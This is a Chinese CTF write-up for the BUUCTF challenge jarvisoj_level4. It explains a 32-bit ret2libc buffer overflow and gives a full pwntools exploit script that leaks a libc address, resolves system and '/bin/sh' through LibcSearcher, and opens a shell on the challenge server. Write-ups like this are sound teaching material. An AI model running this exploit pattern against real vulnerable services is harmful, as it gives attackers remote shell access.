标签：-------- BUUCTF addr libc system p32 read PWN payload

jarvisoj_level4

例行检查，32位，开启NX保护

运行一下

用IDA打开。查看主函数

查看vulnerable_function()函数

buf存在溢出漏洞。
是一道ret2libc类型的题目。
利用第一次溢出泄露libc版本，从而获取system函数和"/bin/sh"的地址，并且返回重新执行主函数。
再利用第二次栈溢出跳转执行system("/bin/sh")

from pwn import *
from LibcSearcher import *

context(os = "linux", arch = "i386", log_level= "debug")
p = remote("node3.buuoj.cn", 25659)
elf = ELF("./level4")
#获取函数在表里的位置
read_got = elf.got["read"]
write_plt = elf.plt["write"]
main_addr = elf.symbols["main"]

#构造第一个payload
payload = 'a' * (0x88+4) + p32(write_plt)
payload += p32(main_addr)
payload += p32(1) + p32(read_got) + p32(4)

p.sendline(payload)

#接收并计算出它们在libc库里的地址
read_addr = u32(p.recvuntil("\xf7")[-4:])
libc = LibcSearcher("read", read_addr)
libc_base = read_addr - libc.dump("read")
system_addr = libc_base + libc.dump("system")
binsh_addr = libc_base + libc.dump("str_bin_sh")
#构造第二个payload

payload = 'a' * (0x88+4)+ p32(system_addr)
payload += p32(main_addr)
payload += p32(binsh_addr)
p.sendline(payload)

p.interactive()

标签：--------,BUUCTF,addr,libc,system,p32,read,PWN,payload
来源： https://blog.csdn.net/BangSen1/article/details/115407402

本站声明： 1. iCode9 技术分享网（下文简称本站）提供的所有内容，仅供技术学习、探讨和分享；
2. 关于本站的所有留言、评论、转载及引用，纯属内容发起人的个人观点，与本站观点和立场无关；
3. 关于本站的所有言论和文字，纯属内容发起人的个人观点，与本站观点和立场无关；
4. 本站文章均是网友提供，不完全保证技术分享内容的完整性、准确性、时效性、风险性和版权归属；如您发现该文章侵犯了您的权益，可联系我们第一时间进行删除；
5. 本站为非盈利性的个人网站，所有内容不会用来进行牟利，也不会利用任何形式的广告来间接获益，纯粹是为了广大技术爱好者提供技术内容和技术思想的分享性交流网站。